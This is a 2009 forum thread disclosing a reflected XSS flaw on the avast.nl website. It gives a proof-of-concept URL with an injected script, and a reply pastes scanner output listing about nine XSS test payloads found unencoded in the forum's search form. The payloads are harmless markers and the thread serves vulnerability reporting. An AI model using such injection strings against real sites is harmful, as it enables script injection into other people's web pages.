Author Topic: Avast.nl website -XSS & Iframe injection flaw  (Read 3773 times)

0 Members and 1 Guest are viewing this topic.

Methodman

  • Guest
Avast.nl website -XSS & Iframe injection flaw
« on: May 31, 2009, 01:12:04 PM »
POC
Code: [Select]
http://www.avast.nl/web/index.php?pageId=33&mode="><script>alert(String.fromCharCode(88,83,83))</script>

See some screenshots:
http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/20090531_Avast___XSS.html

Offline polonus

  • Avast √úberevangelist
  • Probably Bot
  • *****
  • Posts: 33519
  • malware fighter
Re: Avast.nl website -XSS & Iframe injection flaw
« Reply #1 on: May 31, 2009, 03:44:56 PM »
Hi Methodman,

Thanks for reporting, but there is more here: unnamed form::search - found unencoded:
Code: [Select]
; \ / ' = Security Compass Logo
Test Results
XSS Heuristic Test Results
    ;   \   /   <   >   "   '   =

Warnings:

Results:
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT <B>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC=" &#14; javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="javascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="jav ascript:document.vulnerable=true;">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT>document.vulnerable=true;</SCRIPT>
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

Results generated on May 31, 2009 for hxtp://forum.avast.com/index.php?action=p*

There is an awful lot penetration testing left to do online, that is why we have so many online threats going on,

polonus

P.S. If I use the script in a query, Firekeeper flag that in Firefox, glad to have Firekeeper for this....
« Last Edit: June 01, 2009, 12:39:40 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!